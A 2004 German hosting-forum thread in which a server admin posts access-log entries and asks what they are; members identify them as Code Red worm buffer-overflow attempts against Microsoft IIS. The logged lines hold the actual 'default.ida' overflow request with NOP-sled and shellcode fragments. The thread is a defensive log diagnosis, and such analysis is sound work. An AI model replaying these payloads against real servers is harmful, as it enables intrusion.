Omg was ist das :?

Rund um die Sicherheit des Systems und die Applikationen
Post Reply
format-c
Posts: 4
Joined: 2003-12-10 21:59
 

Omg was ist das :?

Post by format-c »

81.248.14.81 - - [08/Jan/2004:23:22:41 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
81.248.14.81 - - [09/Jan/2004:01:24:59 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
81.49.209.207 - - [09/Jan/2004:05:15:05 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
212.202.43.165 - - [09/Jan/2004:07:27:26 +0100] "GET /mod_ssl:error:HTTP-request HTTP/1.0" 400 562
da habsch ich meiner access log in für httpd gefunden

kann mir einer sagne was das is hab das jetzt schon paar mal in meiner log und auch auf nen andern server

for help währe ich dankbar
chris76
Posts: 1878
Joined: 2003-06-27 14:37
Location: Germering
 

Re: Omg was ist das :?

Post by chris76 »

Ich würde mal sagen da hat jemad versucht einen Buffer overflow zu verursachen
format-c
Posts: 4
Joined: 2003-12-10 21:59
 

Re: Omg was ist das :?

Post by format-c »

kann mir das was anhaben :?
captaincrunch
Userprojekt
Userprojekt
Posts: 7066
Joined: 2002-10-09 14:30
Location: Dorsten
Contact:
 

Re: Omg was ist das :?

Post by captaincrunch »

DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
format-c
Posts: 4
Joined: 2003-12-10 21:59
 

Re: Omg was ist das :?

Post by format-c »

hm wenn ich dem englischen mächtig bin soll das heissen nein :)

nur windows webserver oda
captaincrunch
Userprojekt
Userprojekt
Posts: 7066
Joined: 2002-10-09 14:30
Location: Dorsten
Contact:
 

Re: Omg was ist das :?

Post by captaincrunch »

Du kannst gerne auch nach deutschsprachigen Google-Einträgen über Code Red suchen. ;)
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
chris76
Posts: 1878
Joined: 2003-06-27 14:37
Location: Germering
 

Re: Omg was ist das :?

Post by chris76 »

Last edited by chris76 on 2004-01-09 15:59, edited 1 time in total.
format-c
Posts: 4
Joined: 2003-12-10 21:59
 

Re: Omg was ist das :?

Post by format-c »

Betroffen sind die Microsoft Webserver von NT 4.0 und Windows 2000.

schön :)

da kann ich ja beruhigt mein newbie dasein leben :9
mtealc
Posts: 11
Joined: 2003-03-07 11:34
Location: INGOLSTADT
Contact:
 

Re: Omg was ist das :?

Post by mtealc »

die webserver müßten doch schon alle gepatch sein oder gibts da immer noch ein paar windoff-admins die es veräumt haben?
:lol:
User avatar
Joe User
Project Manager
Project Manager
Posts: 11191
Joined: 2003-02-27 01:00
Location: Hamburg
Contact:
 

Re: Omg was ist das :?

Post by Joe User »

MTealc wrote:die webserver müßten doch schon alle gepatch sein oder gibts da immer noch ein paar windoff-admins die es veräumt haben?
:lol:
Wenn's denn nur ein paar wären...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
Post Reply